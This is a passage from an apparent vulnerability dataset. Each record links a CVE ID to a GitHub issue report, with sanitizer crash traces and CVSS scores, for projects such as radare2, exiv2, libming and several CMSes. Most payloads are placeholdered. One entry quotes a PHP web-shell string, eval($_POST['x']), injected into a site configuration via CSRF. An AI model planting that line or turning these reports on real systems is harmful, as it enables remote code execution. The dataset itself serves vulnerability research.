NUMBERTAG f NUMBERTAG d4f NUMBERTAG d in r_core_cmd_subst PATHTAG NUMBERTAG f NUMBERTAG d NUMBERTAG f NUMBERTAG in r_core_cmd PATHTAG NUMBERTAG f NUMBERTAG d NUMBERTAG d NUMBERTAG in r_core_cmd0 PATHTAG NUMBERTAG cc NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG cc NUMBERTAG bd NUMBERTAG in _start ( PATHTAG )",
  32808. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  32809. "severity": "MEDIUM",
  32810. "baseScore": 5.5,
  32811. "impactScore": 3.6,
  32812. "exploitabilityScore": 1.8
  32813. },
  32814. {
  32815. "CVE_ID": "CVE-2018-8809",
  32816. "Issue_Url_old": "https://github.com/radare/radare2/issues/9726",
  32817. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/9726",
  32818. "Repo_new": "radareorg/radare2",
  32819. "Issue_Created_At": "2018-03-19T17:46:24Z",
  32820. "description": "heap buffer overflow in dalvik_op APITAG Working environment: PATHTAG Ubuntu NUMBERTAG File format of the file you reverse: Dalvik dex Architecture/bits of the file: Arm/dex version NUMBERTAG r2 v output: radare NUMBERTAG git NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG gd NUMBERTAG faff commit: d NUMBERTAG faff build NUMBERTAG Expected behavior: successfully analyzing dex file Actual behavior: heap buffer overflow under ASAN Steps to reproduce the behavior NUMBERTAG compile radare2 with: ASAN='address' FILETAG NUMBERTAG run: radare2 A $POC the POC is attached: FILETAG The sanitizer output and backtrace is NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG b NUMBERTAG at pc NUMBERTAG f8cd NUMBERTAG c NUMBERTAG bp NUMBERTAG ffd4b4f2b NUMBERTAG sp NUMBERTAG ffd4b4f2b NUMBERTAG READ of size NUMBERTAG at NUMBERTAG b NUMBERTAG thread T NUMBERTAG f8cd NUMBERTAG c NUMBERTAG in dalvik_op PATHTAG NUMBERTAG f8cd NUMBERTAG in r_anal_op PATHTAG NUMBERTAG f8cd NUMBERTAG d NUMBERTAG in r_core_anal_search_xrefs PATHTAG NUMBERTAG f8cd NUMBERTAG dc2 in r_core_anal_refs PATHTAG NUMBERTAG f8cd NUMBERTAG in cmd_anal_all PATHTAG NUMBERTAG f8cd NUMBERTAG in cmd_anal PATHTAG NUMBERTAG f8cd NUMBERTAG d8 in r_cmd_call PATHTAG NUMBERTAG f8cd NUMBERTAG b7fe2 in r_core_cmd_subst_i PATHTAG NUMBERTAG f8cd NUMBERTAG b NUMBERTAG d in r_core_cmd_subst PATHTAG NUMBERTAG f8cd NUMBERTAG bcf NUMBERTAG in r_core_cmd PATHTAG NUMBERTAG f8cd NUMBERTAG bdd NUMBERTAG in r_core_cmd0 PATHTAG NUMBERTAG a NUMBERTAG in main PATHTAG NUMBERTAG f8cd2c NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG a NUMBERTAG dd NUMBERTAG in _start ( PATHTAG )",
  32821. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  32822. "severity": "MEDIUM",
  32823. "baseScore": 5.5,
  32824. "impactScore": 3.6,
  32825. "exploitabilityScore": 1.8
  32826. },
  32827. {
  32828. "CVE_ID": "CVE-2018-8810",
  32829. "Issue_Url_old": "https://github.com/radare/radare2/issues/9727",
  32830. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/9727",
  32831. "Repo_new": "radareorg/radare2",
  32832. "Issue_Created_At": "2018-03-19T18:03:25Z",
  32833. "description": "heap buffer overflow in get_ivar_list_t APITAG Working environment: PATHTAG Ubuntu NUMBERTAG File format of the file you reverse: Mach O Architecture/bits of the file: arm subarchitecture NUMBERTAG r2 v output: radare NUMBERTAG git NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG gd NUMBERTAG faff commit: d NUMBERTAG faff build NUMBERTAG Expected behavior: successfully analyzing dex file Actual behavior: heap buffer overflow under ASAN Steps to reproduce the behavior NUMBERTAG compile radare2 with: ASAN='address' FILETAG NUMBERTAG run: radare2 qc ij $POC the POC is attached: FILETAG The sanitizer output and backtrace is NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG b3d at pc NUMBERTAG f NUMBERTAG b3e5 bp NUMBERTAG ffc NUMBERTAG f NUMBERTAG c0 sp NUMBERTAG ffc NUMBERTAG f6e NUMBERTAG READ of size NUMBERTAG at NUMBERTAG b3d thread T NUMBERTAG f NUMBERTAG b3e4 in strdup ( PATHTAG NUMBERTAG f NUMBERTAG bc0e3c in get_ivar_list_t PATHTAG NUMBERTAG f NUMBERTAG bc4adf in get_class_ro_t PATHTAG NUMBERTAG f NUMBERTAG bc NUMBERTAG b in get_class_t PATHTAG NUMBERTAG f NUMBERTAG bc5b NUMBERTAG in parse_classes PATHTAG NUMBERTAG f NUMBERTAG af NUMBERTAG in r_bin_object_set_items PATHTAG NUMBERTAG f NUMBERTAG af NUMBERTAG a in r_bin_object_new PATHTAG NUMBERTAG f NUMBERTAG af1dad in r_bin_file_new_from_bytes PATHTAG NUMBERTAG f NUMBERTAG ad5d NUMBERTAG in r_bin_load_io_at_offset_as_sz PATHTAG NUMBERTAG f NUMBERTAG ad5df5 in r_bin_load_io_at_offset_as PATHTAG NUMBERTAG f NUMBERTAG ad NUMBERTAG in r_bin_load_io PATHTAG NUMBERTAG f NUMBERTAG bd3c NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG bd4f2e in r_core_bin_load PATHTAG NUMBERTAG a NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG df NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG a NUMBERTAG dd NUMBERTAG in _start ( PATHTAG )",
  32834. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  32835. "severity": "MEDIUM",
  32836. "baseScore": 5.5,
  32837. "impactScore": 3.6,
  32838. "exploitabilityScore": 1.8
  32839. },
  32840. {
  32841. "CVE_ID": "CVE-2018-8811",
  32842. "Issue_Url_old": "https://github.com/alkacon/opencms-core/issues/586",
  32843. "Issue_Url_new": "https://github.com/alkacon/opencms-core/issues/586",
  32844. "Repo_new": "alkacon/opencms-core",
  32845. "Issue_Created_At": "2018-03-20T04:50:33Z",
  32846. "description": "Cross Site Request Forgery Vulnerability in APITAG NUMBERTAG Hi Team, I would like to report Multiple CSRF vulnerability in latest version. mitre.org assigned new CVE for this vulnerabiliity. Description: Cross site request forgery (CSRF) vulnerability in PATHTAG in APITAG NUMBERTAG allows remote attackers to hijack the authentication of unspecified victims for requests that perform privilege escalation. Steps to Reproduce NUMBERTAG Send below crafted request to logged in user who is having Root Administrator level access. CODETAG NUMBERTAG Once the logged in user opens the URL the form will get submitted with active session of root administrator and action get performed successfully. Fix: Implementation of random token in every state changing request will mitigate the issue. Affected Version NUMBERTAG release",
  32847. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  32848. "severity": "HIGH",
  32849. "baseScore": 8.8,
  32850. "impactScore": 5.9,
  32851. "exploitabilityScore": 2.8
  32852. },
  32853. {
  32854. "CVE_ID": "CVE-2018-8813",
  32855. "Issue_Url_old": "https://github.com/wolfcms/wolfcms/issues/670",
  32856. "Issue_Url_new": "https://github.com/wolfcms/wolfcms/issues/670",
  32857. "Repo_new": "wolfcms/wolfcms",
  32858. "Issue_Created_At": "2018-03-18T12:43:32Z",
  32859. "description": "APITAG NUMBERTAG Open Redirection Vulnerability. Steps to reproduce the problem NUMBERTAG Navigate to http:// FILETAG Additional information NUMBERTAG Attacker can redirect users to malicious domains and can perform social engineering attacks. Wolf CMS version NUMBERTAG",
  32860. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  32861. "severity": "MEDIUM",
  32862. "baseScore": 4.8,
  32863. "impactScore": 2.7,
  32864. "exploitabilityScore": 1.7
  32865. },
  32866. {
  32867. "CVE_ID": "CVE-2018-8814",
  32868. "Issue_Url_old": "https://github.com/wolfcms/wolfcms/issues/671",
  32869. "Issue_Url_new": "https://github.com/wolfcms/wolfcms/issues/671",
  32870. "Repo_new": "wolfcms/wolfcms",
  32871. "Issue_Created_At": "2018-03-18T12:47:16Z",
  32872. "description": "APITAG NUMBERTAG Cross Site Request Forgery. Steps to reproduce the problem Send below request to logged in user to change the plugin settings. FILETAG Also an attacker remotely uninstall any plugin by simply sending below URL. URLTAG Additional information Wolf CMS version NUMBERTAG Please include narvaneni. EMAILTAG in fix release.",
  32873. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  32874. "severity": "MEDIUM",
  32875. "baseScore": 6.5,
  32876. "impactScore": 3.6,
  32877. "exploitabilityScore": 2.8
  32878. },
  32879. {
  32880. "CVE_ID": "CVE-2018-8815",
  32881. "Issue_Url_old": "https://github.com/alkacon/opencms-core/issues/587",
  32882. "Issue_Url_new": "https://github.com/alkacon/opencms-core/issues/587",
  32883. "Repo_new": "alkacon/opencms-core",
  32884. "Issue_Created_At": "2018-03-20T05:29:34Z",
  32885. "description": "Stored Cross Site Scripting via SVG image upload in Gallery Functionality. Dear Team, i would like to report persistent xss vulnerability in latest release. Mitre.org assigned a CVE ID for this. Description: Cross Site Scripting (XSS) Vulnerability in Gallery functionality in APITAG NUMBERTAG allows remote attackers to execute arbitrary web script via crafted svg image. Steps to Reproduce NUMBERTAG Login as user who is having Gallery Editor role NUMBERTAG Navigate to gallery and upload below svg file. CODETAG NUMBERTAG Once other user who is having Root Administrator permissions visited the image link or viewed the uploaded svg image the script get executed. Fix: Input file validation Affected Version NUMBERTAG latest release",
  32886. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N",
  32887. "severity": "MEDIUM",
  32888. "baseScore": 4.6,
  32889. "impactScore": 2.5,
  32890. "exploitabilityScore": 2.1
  32891. },
  32892. {
  32893. "CVE_ID": "CVE-2018-8832",
  32894. "Issue_Url_old": "https://github.com/enhavo/enhavo/issues/459",
  32895. "Issue_Url_new": "https://github.com/enhavo/enhavo/issues/459",
  32896. "Repo_new": "enhavo/enhavo",
  32897. "Issue_Created_At": "2018-03-13T04:49:26Z",
  32898. "description": "Admin page Stored Cross site Scripting (XSS). Summary FILETAG has XSS security issue on the admin page. An authorized attacker can put any kind of javascript. And it is executed on authorized Victim browser without induce Reproduction Here is how to reproduce this issue NUMBERTAG Access to the admin page NUMBERTAG Create an Usergroup as payloads NUMBERTAG Back to admin user group page. Then you find that dialog appeared and XSS happens. Payloads Set Usergroup as following. ERRORTAG Event NUMBERTAG uln is discovered NUMBERTAG Contact to developers NUMBERTAG No response and full disclosure",
  32899. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  32900. "severity": "MEDIUM",
  32901. "baseScore": 4.8,
  32902. "impactScore": 2.7,
  32903. "exploitabilityScore": 1.7
  32904. },
  32905. {
  32906. "CVE_ID": "CVE-2018-8899",
  32907. "Issue_Url_old": "https://github.com/IdentityServer/IdentityServer4/issues/2164",
  32908. "Issue_Url_new": "https://github.com/identityserver/identityserver4/issues/2164",
  32909. "Repo_new": "identityserver/identityserver4",
  32910. "Issue_Created_At": "2018-03-20T13:19:18Z",
  32911. "description": "Encode redirect uri on authorization response.",
  32912. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  32913. "severity": "MEDIUM",
  32914. "baseScore": 6.1,
  32915. "impactScore": 2.7,
  32916. "exploitabilityScore": 2.8
  32917. },
  32918. {
  32919. "CVE_ID": "CVE-2018-8960",
  32920. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1020",
  32921. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1020",
  32922. "Repo_new": "imagemagick/imagemagick",
  32923. "Issue_Created_At": "2018-03-13T08:25:23Z",
  32924. "description": "heap buffer overflow. PATHTAG convert version Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): bzlib djvu fftw fontconfig fpx freetype jbig jng jpeg lcms lqr lzma openexr pangocairo png tiff webp wmf x xml zlib PATHTAG convert tif_heap buffer overflow dev/null APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG c NUMBERTAG c NUMBERTAG c at pc NUMBERTAG f NUMBERTAG a3bc NUMBERTAG bp NUMBERTAG ffc3e5db NUMBERTAG sp NUMBERTAG ffc3e5db NUMBERTAG READ of size NUMBERTAG at NUMBERTAG c NUMBERTAG c NUMBERTAG c thread T NUMBERTAG f NUMBERTAG a3bc NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG e0 in APITAG APITAG NUMBERTAG f NUMBERTAG a in APITAG APITAG NUMBERTAG f NUMBERTAG e3e NUMBERTAG f in APITAG APITAG NUMBERTAG f NUMBERTAG d in APITAG APITAG NUMBERTAG d9 in APITAG APITAG NUMBERTAG f NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG in _start ( PATHTAG NUMBERTAG c NUMBERTAG c NUMBERTAG c is located NUMBERTAG bytes inside of NUMBERTAG byte region FILETAG",
  32925. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  32926. "severity": "HIGH",
  32927. "baseScore": 8.8,
  32928. "impactScore": 5.9,
  32929. "exploitabilityScore": 2.8
  32930. },
  32931. {
  32932. "CVE_ID": "CVE-2018-8961",
  32933. "Issue_Url_old": "https://github.com/libming/libming/issues/130",
  32934. "Issue_Url_new": "https://github.com/libming/libming/issues/130",
  32935. "Repo_new": "libming/libming",
  32936. "Issue_Created_At": "2018-03-22T03:27:43Z",
  32937. "description": "multiple heap use after frees in decompile.c. In latest version NUMBERTAG and commit of libming, there are multiple heap use after frees in PATHTAG functions of decompile.c, which could be triggered by the POCs below. To reproduce the issue, compile with ASAN and run: ./swftophp $POC ./swftophp libming NUMBERTAG swftophp_heap use after APITAG APITAG NUMBERTAG ERROR: APITAG heap use after free on address NUMBERTAG at pc NUMBERTAG fef9 bp NUMBERTAG ffc4b NUMBERTAG a NUMBERTAG sp NUMBERTAG ffc4b NUMBERTAG a NUMBERTAG READ of size NUMBERTAG at NUMBERTAG thread T NUMBERTAG fef8 in APITAG PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG in APITAG PATHTAG NUMBERTAG af NUMBERTAG in APITAG PATHTAG NUMBERTAG af NUMBERTAG in APITAG PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG b NUMBERTAG in APITAG PATHTAG NUMBERTAG b NUMBERTAG in main PATHTAG NUMBERTAG efe9f3e0c NUMBERTAG in __libc_start_main APITAG NUMBERTAG ERRORTAG NUMBERTAG d3 ( PATHTAG ERRORTAG NUMBERTAG d3) ./swftophp libming NUMBERTAG swftophp_heap use after APITAG NUMBERTAG ERROR: APITAG heap use after free on address NUMBERTAG at pc NUMBERTAG eed4 bp NUMBERTAG ffd4a NUMBERTAG ba NUMBERTAG sp NUMBERTAG ffd4a NUMBERTAG ba NUMBERTAG READ of size NUMBERTAG at NUMBERTAG thread T NUMBERTAG eed3 in APITAG PATHTAG NUMBERTAG c in APITAG PATHTAG NUMBERTAG c in APITAG PATHTAG NUMBERTAG af NUMBERTAG in APITAG PATHTAG NUMBERTAG af NUMBERTAG in APITAG PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG b NUMBERTAG in APITAG PATHTAG NUMBERTAG b NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG e NUMBERTAG b9c NUMBERTAG in __libc_start_main APITAG NUMBERTAG ERRORTAG NUMBERTAG d3 ( PATHTAG ERRORTAG NUMBERTAG d3) ./swftophp FILETAG libming NUMBERTAG swftophp_heap use after APITAG APITAG NUMBERTAG ERROR: APITAG heap use after free on address NUMBERTAG a0 at pc NUMBERTAG fef9 bp NUMBERTAG ffd NUMBERTAG d NUMBERTAG db0 sp NUMBERTAG ffd NUMBERTAG d NUMBERTAG da8 READ of size NUMBERTAG at NUMBERTAG a0 thread T NUMBERTAG fef8 in APITAG PATHTAG NUMBERTAG bd NUMBERTAG in APITAG PATHTAG NUMBERTAG bd NUMBERTAG in APITAG PATHTAG NUMBERTAG af NUMBERTAG in APITAG PATHTAG NUMBERTAG af NUMBERTAG in APITAG PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG b NUMBERTAG in APITAG PATHTAG NUMBERTAG b NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG a5ac NUMBERTAG in __libc_start_main APITAG NUMBERTAG ERRORTAG NUMBERTAG d3 ( PATHTAG ERRORTAG NUMBERTAG d3)",
  32938. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  32939. "severity": "MEDIUM",
  32940. "baseScore": 6.5,
  32941. "impactScore": 3.6,
  32942. "exploitabilityScore": 2.8
  32943. },
  32944. {
  32945. "CVE_ID": "CVE-2018-8972",
  32946. "Issue_Url_old": "https://github.com/CREDITWEST/CWCMS/issues/1",
  32947. "Issue_Url_new": "https://github.com/creditwest/cwcms/issues/1",
  32948. "Repo_new": "creditwest/cwcms",
  32949. "Issue_Created_At": "2018-03-24T13:28:18Z",
  32950. "description": "Cwcms Backstage CSRF Getshaell.. APITAG PHP NUMBERTAG can write \";eval($_POST['x']);// to the site configuration getshell, which can be used in conjunction with the website configuration CSRF vulnerability getshell.",
  32951. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  32952. "severity": "HIGH",
  32953. "baseScore": 8.8,
  32954. "impactScore": 5.9,
  32955. "exploitabilityScore": 2.8
  32956. },
  32957. {
  32958. "CVE_ID": "CVE-2018-8976",
  32959. "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/246",
  32960. "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/246",
  32961. "Repo_new": "exiv2/exiv2",
  32962. "Issue_Created_At": "2018-03-23T09:37:18Z",
  32963. "description": "a bug in APITAG a bug results to segment fault in APITAG and it maybe a string format vulnerability which could be exploited. the debug info as follows: Breakpoint NUMBERTAG APITAG (format NUMBERTAG ffff NUMBERTAG a NUMBERTAG ld NUMBERTAG ff NUMBERTAG s\") at APITAG NUMBERTAG rc = vsnprintf(&buffer NUMBERTAG APITAG format, args); gdb peda$ n Program received signal SIGSEGV, Segmentation fault. [ registers ] RA NUMBERTAG RB NUMBERTAG fffffffd NUMBERTAG ffffbad NUMBERTAG RC NUMBERTAG ffffffffffffffff RD NUMBERTAG RSI NUMBERTAG fffffe8 RDI NUMBERTAG RBP NUMBERTAG fffffffd NUMBERTAG b NUMBERTAG fffffff\") RSP NUMBERTAG fffffffcf NUMBERTAG RIP NUMBERTAG ffff6d NUMBERTAG APITAG repnz scas al,BYTE PTR es:[rdi]) R NUMBERTAG fffffff R NUMBERTAG ffff7fe NUMBERTAG ffff7fe NUMBERTAG R NUMBERTAG ffff NUMBERTAG bfe NUMBERTAG R NUMBERTAG R NUMBERTAG ffff6d NUMBERTAG f NUMBERTAG APITAG cmp BYTE PTR [rbp NUMBERTAG R NUMBERTAG R NUMBERTAG ffff NUMBERTAG a NUMBERTAG ld NUMBERTAG ff NUMBERTAG s\") R NUMBERTAG fffffffd6e NUMBERTAG EFLAGS NUMBERTAG carry PARITY adjust zero SIGN trap INTERRUPT direction overflow) [ code NUMBERTAG ffff6d NUMBERTAG a APITAG : xor eax,ea NUMBERTAG ffff6d NUMBERTAG c APITAG : or rc NUMBERTAG ffffffffffffffff NUMBERTAG ffff6d NUMBERTAG APITAG : mov rdi,r NUMBERTAG ffff6d NUMBERTAG APITAG : repnz scas al,BYTE PTR es:[rdi NUMBERTAG ffff6d NUMBERTAG APITAG : mov DWORD PTR [rbp NUMBERTAG ffff6d NUMBERTAG f APITAG : mov rsi,rc NUMBERTAG ffff6d NUMBERTAG APITAG : not rsi NUMBERTAG ffff6d NUMBERTAG APITAG : lea r NUMBERTAG rsi NUMBERTAG stack NUMBERTAG fffffffcf NUMBERTAG fffffffcf NUMBERTAG fffffffcf NUMBERTAG fffffffcf NUMBERTAG fffffffcf NUMBERTAG fffffffcf NUMBERTAG fffffffcf NUMBERTAG fffffffd0b NUMBERTAG ffffffffffffffff NUMBERTAG fffffffcf NUMBERTAG Legend: code, data, rodata, value Stopped reason: SIGSEG NUMBERTAG ffff6d NUMBERTAG in _IO_vfprintf_internal (s=s APITAG format=<optimized out>, format APITAG NUMBERTAG ld NUMBERTAG ff NUMBERTAG s\", ap=ap APITAG at APITAG NUMBERTAG fprintf.c: No such file or directory. gdb peda$ bt NUMBERTAG ffff6d NUMBERTAG in _IO_vfprintf_internal (s=s APITAG format=<optimized out>, format APITAG NUMBERTAG ld NUMBERTAG ff NUMBERTAG s\", ap=ap APITAG at APITAG NUMBERTAG ffff6d2d NUMBERTAG in _IO_vsnprintf (string NUMBERTAG b NUMBERTAG fffffff\", maxlen=<optimized out>, format NUMBERTAG ffff NUMBERTAG a NUMBERTAG ld NUMBERTAG ff NUMBERTAG s\", args NUMBERTAG fffffffd6e0) at APITAG NUMBERTAG ffff NUMBERTAG d in APITAG (format NUMBERTAG ffff NUMBERTAG a NUMBERTAG ld NUMBERTAG ff NUMBERTAG s\") at APITAG NUMBERTAG ffff NUMBERTAG e9 in APITAG (this NUMBERTAG a NUMBERTAG out=..., APITAG depth NUMBERTAG at APITAG NUMBERTAG cafe in APITAG (this NUMBERTAG e0, out=..., APITAG at APITAG NUMBERTAG c NUMBERTAG b in APITAG (this NUMBERTAG e0, PATHTAG ) at APITAG NUMBERTAG e NUMBERTAG in main (argc NUMBERTAG arg NUMBERTAG fffffffe4b8) at APITAG NUMBERTAG ffff6cdcf NUMBERTAG in __libc_start_main (main NUMBERTAG e NUMBERTAG e <main(int, char const )>, argc NUMBERTAG arg NUMBERTAG fffffffe4b8, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end NUMBERTAG fffffffe4a8) at libc APITAG NUMBERTAG dfb9 in _start () APITAG the bug trigger commandline is : PATHTAG pS $POC please ref the following url for the poc: FILETAG",
  32964. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  32965. "severity": "MEDIUM",
  32966. "baseScore": 6.5,
  32967. "impactScore": 3.6,
  32968. "exploitabilityScore": 2.8
  32969. },
  32970. {
  32971. "CVE_ID": "CVE-2018-8977",
  32972. "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/247",
  32973. "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/247",
  32974. "Repo_new": "exiv2/exiv2",
  32975. "Issue_Created_At": "2018-03-23T09:57:44Z",
  32976. "description": "Invalid memory access in APITAG An Invalid memory access in APITAG in APITAG the debug info as follows : s ] RA NUMBERTAG b8 RB NUMBERTAG RC NUMBERTAG fffffffdb NUMBERTAG ERRORTAG NUMBERTAG d NUMBERTAG f ('/P') RD NUMBERTAG ad NUMBERTAG RSI NUMBERTAG fffffffdbdf NUMBERTAG RDI NUMBERTAG ad NUMBERTAG RBP NUMBERTAG fffffffdd NUMBERTAG fffffffde NUMBERTAG fffffffde NUMBERTAG fffffffe NUMBERTAG fffffffe NUMBERTAG fffffffe NUMBERTAG RSP NUMBERTAG fffffffdc NUMBERTAG RIP NUMBERTAG ffff NUMBERTAG bf APITAG APITAG const&, APITAG const NUMBERTAG mov rax,QWORD PTR [rax]) R NUMBERTAG R NUMBERTAG R NUMBERTAG fffffffda NUMBERTAG R NUMBERTAG cf1c APITAG APITAG const>: push rbp) R NUMBERTAG R NUMBERTAG R NUMBERTAG R NUMBERTAG EFLAGS NUMBERTAG carry PARITY adjust zero sign trap INTERRUPT direction overflow) [ code NUMBERTAG ffff NUMBERTAG b3 APITAG APITAG const&, APITAG const NUMBERTAG mov rdx,ra NUMBERTAG ffff NUMBERTAG b6 APITAG APITAG const&, APITAG const NUMBERTAG mov rax,QWORD PTR [rd NUMBERTAG ffff NUMBERTAG b9 APITAG APITAG const&, APITAG const NUMBERTAG add ra NUMBERTAG b NUMBERTAG ffff NUMBERTAG bf APITAG APITAG const&, APITAG const NUMBERTAG mov rax,QWORD PTR [ra NUMBERTAG ffff NUMBERTAG c2 APITAG APITAG const&, APITAG const NUMBERTAG mov rdi,rd NUMBERTAG ffff NUMBERTAG c5 APITAG APITAG const&, APITAG const NUMBERTAG call ra NUMBERTAG ffff NUMBERTAG c7 APITAG APITAG const&, APITAG const NUMBERTAG mov rdx,ra NUMBERTAG ffff NUMBERTAG ca APITAG APITAG const&, APITAG const NUMBERTAG lea rax,[rbp NUMBERTAG d0] [ stack NUMBERTAG fffffffdc NUMBERTAG fffffffdc NUMBERTAG f NUMBERTAG b4f NUMBERTAG fffffffdc NUMBERTAG fffffffdc NUMBERTAG ac NUMBERTAG a NUMBERTAG f NUMBERTAG d9c NUMBERTAG da NUMBERTAG fffffffdc NUMBERTAG ffff7b NUMBERTAG d NUMBERTAG ffff NUMBERTAG APITAG APITAG push rbp NUMBERTAG fffffffdc NUMBERTAG fffffffde NUMBERTAG ffff NUMBERTAG b NUMBERTAG ffff NUMBERTAG a0 APITAG push rb NUMBERTAG fffffffdc NUMBERTAG ffff7b NUMBERTAG c NUMBERTAG fffffffdc NUMBERTAG ffff7b NUMBERTAG a NUMBERTAG Legend: code, data, rodata, value Stopped reason: SIGSEG NUMBERTAG ffff NUMBERTAG bf in APITAG (os=..., value=..., metadata NUMBERTAG ac0) at APITAG NUMBERTAG if( metadata APITAG )) APITAG == APITAG EOS NUMBERTAG D\" gdb peda$ bt NUMBERTAG ffff NUMBERTAG bf in APITAG (os=..., value=..., metadata NUMBERTAG ac0) at APITAG NUMBERTAG ffff NUMBERTAG e NUMBERTAG in APITAG (os=..., value=..., metadata NUMBERTAG ac0) at APITAG NUMBERTAG ffff NUMBERTAG ce NUMBERTAG in APITAG (this NUMBERTAG os=..., APITAG at APITAG NUMBERTAG ffff NUMBERTAG f9ba in APITAG (this NUMBERTAG APITAG at APITAG NUMBERTAG in APITAG (this NUMBERTAG md=..., APITAG at APITAG NUMBERTAG fda6 in APITAG (this NUMBERTAG image NUMBERTAG ab0) at APITAG NUMBERTAG fcd4 in APITAG (this NUMBERTAG at APITAG NUMBERTAG c NUMBERTAG b in APITAG (this NUMBERTAG PATHTAG ) at APITAG NUMBERTAG e NUMBERTAG in main (argc NUMBERTAG arg NUMBERTAG fffffffe NUMBERTAG at APITAG NUMBERTAG ffff6cdcf NUMBERTAG in __libc_start_main (main NUMBERTAG e NUMBERTAG e <main(int, char const )>, argc NUMBERTAG arg NUMBERTAG fffffffe NUMBERTAG init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end NUMBERTAG fffffffe NUMBERTAG at libc APITAG NUMBERTAG dfb9 in _start () ============ the bug trigger commandline is : PATHTAG pt $POC please ref the following url for the poc: URLTAG",
  32977. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  32978. "severity": "MEDIUM",
  32979. "baseScore": 6.5,
  32980. "impactScore": 3.6,
  32981. "exploitabilityScore": 2.8
  32982. },
  32983. {
  32984. "CVE_ID": "CVE-2018-9009",
  32985. "Issue_Url_old": "https://github.com/libming/libming/issues/131",
  32986. "Issue_Url_new": "https://github.com/libming/libming/issues/131",
  32987. "Repo_new": "libming/libming",
  32988. "Issue_Created_At": "2018-03-25T01:21:59Z",
  32989. "description": "heap use after free in APITAG (decompile.c). In latest version of libming NUMBERTAG there is a heap buffer overflow in APITAG function of decompile.c file, which could be triggered by the POC below. The \"FREE\" operation corresponds to a \"realloc\" in APITAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG (FILE f, int length NUMBERTAG while ( APITAG < end NUMBERTAG APITAG (f, &(parserrec APITAG parserrec APITAG NUMBERTAG parserrec APITAG = (SWF_ACTION ) realloc (parserrec APITAG NUMBERTAG The freed heap is used in APITAG function APITAG NUMBERTAG static int NUMBERTAG APITAG n, SWF_ACTION actions, int maxn NUMBERTAG if (sactif > Actions FILETAG",
  32990. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  32991. "severity": "HIGH",
  32992. "baseScore": 8.8,
  32993. "impactScore": 5.9,
  32994. "exploitabilityScore": 2.8
  32995. },
  32996. {
  32997. "CVE_ID": "CVE-2018-9037",
  32998. "Issue_Url_old": "https://github.com/monstra-cms/monstra/issues/433",
  32999. "Issue_Url_new": "https://github.com/monstra-cms/monstra/issues/433",
  33000. "Repo_new": "monstra-cms/monstra",
  33001. "Issue_Created_At": "2018-03-28T10:45:33Z",
  33002. "description": "a remote code execution vulnerability.. Hi, I have found a remote code execution vulnerability. Affected Version NUMBERTAG or before Monstra CMS NUMBERTAG allows remote code execution via an upload_file request for a .zip file which is automatically extracted and may contain .php files. Payload: FILETAG FILETAG Direct compression without checking and We can construct a zip plug in that can execute commands FILETAG Testing Environment: os: mac PHP NUMBERTAG Mitigation: Perform security check before decompressing plug in archives",
  33003. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  33004. "severity": "HIGH",
  33005. "baseScore": 8.8,
  33006. "impactScore": 5.9,
  33007. "exploitabilityScore": 2.8
  33008. },
  33009. {
